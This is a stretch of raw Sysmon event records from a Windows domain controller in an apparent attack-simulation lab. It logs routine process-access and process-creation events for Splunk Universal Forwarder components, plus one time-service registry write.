10341000x80000000000000009133Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46B8-6000-F204-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009132Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009131Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009130Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46B8-6000-F204-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.234{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46B8-6000-F204-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:27:20.235{08A6967A-46B8-6000-F204-000000009A01}3540C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000009134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:27:24.797{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea78-0xfeedaf47) 10341000x80000000000000009160Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46EF-6000-F404-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009159Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009158Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46EF-6000-F404-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.905{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46EF-6000-F404-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.906{08A6967A-46EF-6000-F404-000000009A01}5072C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:15.233{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46EF-6000-F304-000000009A01}2828C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 